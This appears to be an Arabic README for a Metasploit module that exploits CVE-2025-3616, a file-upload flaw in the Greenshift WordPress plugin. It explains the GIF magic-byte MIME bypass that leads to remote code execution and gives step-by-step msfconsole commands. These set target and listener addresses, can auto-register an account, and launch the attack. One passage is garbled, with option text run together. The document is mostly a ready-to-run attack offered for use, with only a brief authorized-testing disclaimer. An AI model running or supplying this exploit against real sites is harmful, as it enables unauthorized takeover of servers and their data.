
وحدة Metasploit تستغل ثغرة CVE-2025-3616، وهي رفع ملفات عشوائي في إضافة Greenshift لـ WordPress، مما يتيح للمستخدمين المصادق عليهم تنفيذ تعليمات برمجية عن بعد (RCE) عبر تزوير نوع MIME باستخدام بايتات GIF السحرية.
يحتوي هذا المستودع على وحدة Metasploit لاستغلال CVE-2025-3616، وهي ثغرة تحميل ملف عشوائي في إضافة Greenshift لووردبريس (الإصدارات 11.4 حتى 11.4.5).
تسمح هذه الثغرة للمستخدمين الموثقين (مشترك فما فوق) بتحميل ملفات عشوائية تؤدي إلى تنفيذ أكواد عن بعد (RCE). وهي تتجاوز التحقق من نوع الملف في الإضافة عن طريق تزوير نوع MIME باستخدام بايتات سحرية لـ GIF (GIF89a;).
USERNAME/PASSWORD).REGISTER لتسجيل مستخدم جديد تلقائيًا واستغلال الثغرة باستخدام ملفات تعريف الارتباط للجلسة الجديدة (مفيد إذا كان التسجيل ممكّنًا على الهدف).wp_rest من لوحة التحكم الإدارية.finfo_file().تأكد من تثبيت إطار عمل Metasploit.
انسخ wp_greenshift_file_upload.rb إلى دليل الوحدات المحلي لديك:
mkdir -p ~/.msf4/modules/exploits/unix/webapp/
cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
ابدأ msfconsole وأعد تحميل الوحدات:
msfconsole
msf6 > reload_all
إذا كان التسجيل ممكّنًا على الهدف، فلن تحتاج إلى بيانات اعتماد.
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER true
run
إذا كان لديك بالفعل مستخدم صالح (مشترك أو أعلى):
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER false
set USERNAME <USER>
set PASSWORD <PASS>
run
هذه الوحدة مخصصة للأغراض التعليمية واختبار الاختراق المصرح به فقط. استخدام هذا الكود لمهاجمة أهداف دون موافقة متبادلة مسبقة غير قانوني.
| الخيار | مطلوب | الوصف |
|---|
| RHOSTS | نعم | عنوان الهدف |
| LHOST | نعم | عنوان الاستماع (عنوان IP الخاص بك) |
| REGISTER | لا | اضبطه على true لتسجيل حساب جديد تلقائيًا (الافتراضي: false) |
| USERNAME | لا | اسم مستخدم ووردبريس (مطلوب إذا كان REGISTER خطأ) |
| PASSWORD | لا | كلمة مرور ووردبريس (مطلوب إذا كان REGISTER خطأ) |
| لا | البريد الإلكتروني للتسجيل (اختياري، يتم إنشاؤه تلقائيًا إذا كان فارغًا) |